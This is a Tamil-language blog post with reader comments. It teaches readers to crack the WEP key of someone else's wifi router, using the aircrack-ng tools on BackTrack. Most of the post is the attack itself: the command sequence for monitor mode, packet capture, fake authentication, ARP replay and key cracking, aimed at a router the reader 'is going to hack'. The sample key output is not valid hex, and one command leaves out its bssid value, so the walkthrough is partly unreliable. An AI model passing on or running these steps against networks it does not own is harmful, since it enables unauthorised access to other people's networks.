How to Hack wifi Password | HACKING ALL PRODUCT.
Recommend on Google

3 How to Hack wifi Password



ok Friends,
இன்றைக்கு ஒரு அற்புதமான இடுகை ஒன்றை இடுகிறேன். தலைப்பை பார்த்தவுடன் புரிந்து கொண்டிருப்பீர்கள். yes ஒரு wifi Password ஐ எவ்வாறு Hack செய்வது என்று பார்ப்போம்.

இதற்கு நமக்கு 2 மென்பொருட்கள் தேவை.
1.Back Track5 R2
2.VM Ware Work Station.

இரண்டு மென்பொருளின் Link ஐ யும் கீழே தந்துள்ளேன். பதிவிறக்கி கொள்ளவும்.
ok இப்போது தொடங்குவோம்.

VM Ware Work Station ஐ உங்கள் கணணியில் நிறுவி, அதனுல் Back Track ஐ நிறுவவும். இப்போது Back Trackல் Konsole Terminal திறந்து
  1. airmon-ng
  2. airmon-ng start wlan0
  3. airodump-ng mon0
  4. airodump-ng -c (your channel number) --bssid -w wep mon0
இன்னொமொரு Konsole Terminal திறந்து
  1. aireplay-ng -1 0 -a (your bssid number) mon0
  2. aireplay-ng -3 -b (your bssid number) mon0
இறுதியாக ஒரு Konsole Terminal திறந்து
  1. aircrack-ng wep-01.cap
அவ்வளவுதான் your wifi password HA:CK:IN:G4:20:00 என்று வரும். இதில் : இல்லாமல்  HACKING4200  என்று வரும், HACKING4200 இதுதான் your wifi password.

(இதில் வரும் அனைத்து Your ம் நீங்கள் Hack செய்யப்போகும் Router உடையது.)


இதன் காணொளியைக்கான Hacker Video Tutorial ஐ click செய்யவும்.




HACKER ன் பனிவான வேண்டுகோள். இந்த பக்கத்திலுள்ள Download Link ஐ click செய்தால். ஒரு விளம்பரம் தோன்றும், அதில் வலது பக்க மேல் மூலையில் SKIP AD என்பதை click செய்யவும் என்பதை மிகவும் தாழ்மையுடன் வேண்டிக்கொள்கின்றேன்.

கீழே உள்ள பெட்டியினுள் உங்களுடைய மின்னஞ்சலை Type செய்து பதிவுகளை இலவசமாக பெற்றுக்கொள்ளுங்கள்

3 கருத்துகள்:

  1. உங்கள் பதிவுகள் எனக்கு மிகவும் பிடித்துள்ளது
    (Konsole Terminal) என்றால் என்ன? அதை எப்படி திறப்பது? நீங்கள் அனுப்பிய காணொளி லினக்ஸ் கு உள்ளது.
    நான் win 7 பயன் படுத்துகிறேன்.நீங்கள் சொன்னது போல் என்னால் பயன்படுத்த முடியவில்லை .உதவுங்கள் நண்பரே...
    raaja.sem@gmail.com

    பதிலளிநீக்கு
    பதில்கள்
    1. நண்பா உங்களுடைய பிரச்சினயை புரிந்து கொண்டேன், நண்பா windows 7 ல் Konsole Terminal இருக்காது. நீங்கள் பதிவிறக்கிய vmware மென்பொருளினுள் BackTrack5 R2 யினை நிறுவ வேண்டும். எப்படி நிறுவுவது என்பதனை எனது அடுத்த பதிவில் காணொளியாக வெளியிடுகிறேன். பார்த்து பயன் பெறுங்கள்.

      நீக்கு

இந்த பதிவிலுள்ள குறைகளையும், இந்த தளம் பற்றிய கருத்துக்களையும் குறிப்பிடுக.

Hello Friends இப்போது என்னிடம் தமிழில் 4 புத்தகங்கள் இருக்கின்றன. அவற்றை உங்களோடு பகிர்ந்து கொள்ள விரும்புகிறேன். அதில் உங்களுக்கு மிகவும் பயனளிக்க கூடியது எது என்பதை தெரிந்து வாக்களிக்கவும்.